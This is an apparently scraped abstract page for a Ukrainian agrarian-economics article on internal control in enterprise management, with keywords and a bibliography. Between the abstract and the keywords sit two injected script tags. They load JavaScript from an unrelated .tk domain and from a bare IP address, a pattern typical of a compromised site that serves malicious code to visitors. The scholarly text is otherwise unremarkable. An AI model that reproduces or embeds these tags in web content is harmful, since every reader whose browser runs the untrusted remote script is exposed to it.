ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 65.0127:650.141
Управління та інформаційне забезпечення

Внутрихозяйственный контроль в управлении предприятием / Яворова Г.В. // Экономика АПК. - 2013. - № 1 - С. 96

Нестабильные экономические и политические процессы, которые происходят в Украине, закономерно нуждаются в поиске гибких систем управления с целью роста конкурентоспособности и прибыльности отечественных хозяйствующих субъектов. Определено, что результаты управления деятельностью предприятий по большей части зависят от правильно организованного информационного обеспечения и эффективного и рационального принятия управленческих решений на основе его использования. Библиогр.: 8.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключевые слова: хозяйствующие субъекты, внутрихозяйственный контроль, конкурентоспособность, прибыльность, управленские решения, информационное обеспечение

Список использованных источников

  1. Бутинець Ф. Ф. Контроль і ревізія / Ф. Ф. Бутинець, В.П. Бондар, Н.Г. Виговська, Н.І. Петренко: підруч. для студ. вищих навч. закладів спеціальності «Облік і аудит»; за ред. проф. Ф. Ф. Бутинця. - 4-е вид. доп. і перероб. - Житомир: ПП «Рута». 2006. - 560 с.
  2. Голов С.Ф. Бухгалтерський облік в Україні: аналіз стану та перспективи розвитку: монографія. / Голов С.Ф. - К.: Центр навчальної літератури, 2007. - 522 с.
  3. Іванюта П.В. Внутрішньогосподарський (управлінський) облік у виробничих підрозділах сільськогосподарських господарюючих суб’єктів: [навч. посіб.] / Іванюта П.В., Левченко З.М. - К.: Центр навчальної літератури, 2006. - 368 с.
  4. Кірейцев Г. Г. Регулювання розвитку бухгалтерського обліку в сільському господарстві: наук. доп. на міжнар. наук.-практ. конф. Подільського держ. аграрно-техніч. ун-ту 24-25 верес. 2009 р. / Г. Г. Кірейцев. - Кам'янець-Подільський, 2009. - 28 с.
  5. Коріяько М. Д Внутрішній контроль господарської діяльності підприємства: навч. посіб. для студ. вищ. навч. закл. / за ред.. к.е.н. проф. М. Д. Корінька. - Фастів: «Поліфаст», 2006. - 440 с.
  6. Костирко P.O. Контроль і аналіз в системі управління економічним потенціалом господарюючого суб'єкта: методологія та організація: монографія / P.O. Костирко. - Луганськ: вид-во СНУ ім. В. Даля, 2010. - 728 с.
  7. Костикова А.А. Управлінський облік в інформаційній системі управління витратами / А. А. Костякова // Економіка АПК. - 2004. - № 7. - С. 107 - 110.
  8. Подолянчук О. А. Внутрішньогосподарський контроль у діяльності сільськогосподарських підприємств / О. А. Подолянчук // Економіка АПК. - 2010. - № 10. - С. 109-112.
Читать статью: 13_01_14.pdf